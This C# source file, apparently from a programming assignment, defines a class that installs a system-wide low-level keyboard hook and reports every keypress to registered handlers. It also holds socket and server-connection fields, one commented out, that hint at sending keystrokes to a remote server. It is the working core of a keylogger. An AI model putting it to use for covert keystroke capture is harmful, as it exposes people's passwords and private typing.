using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using System.Net.Sockets;
using System.Diagnostics;


namespace assignmentObjects
{
    [Serializable]
    public class KeyboardHooker
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;
        private static Socket toWrite;
        private static Connection serverConnection = null;


        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook,
            LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
            IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
                    GetModuleHandle(curModule.ModuleName), 0);
            }
        }

        public  delegate void KeypressHandler(string keypressed);

        public static event KeypressHandler KeyPress;

        public static void OnKeyPress(string keypressed){
            if (KeyPress != null)
            {
                KeyPress(keypressed);
            }
        }


        private delegate IntPtr LowLevelKeyboardProc(
        int nCode, IntPtr wParam, IntPtr lParam);

        private static IntPtr HookCallback(
            int nCode, IntPtr wParam, IntPtr lParam)
        {          
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                int vkCode = Marshal.ReadInt32(lParam);
                ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
                byte[] buffer = encoding.GetBytes(vkCode.ToString());         
                OnKeyPress(vkCode.ToString());           
            }
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }

        public void initiallize()
        {
            _hookID = SetHook(_proc);
            //toWrite = theConnection;
        }

        public void freeHook()
        {
            UnhookWindowsHookEx(_hookID);

        }

        public static void registerHandler(KeypressHandler theHandler)
        {
            KeyPress += theHandler; 
        }

        public static void setConnection(Connection theConnection){
            serverConnection = theConnection;
        }

    }
}
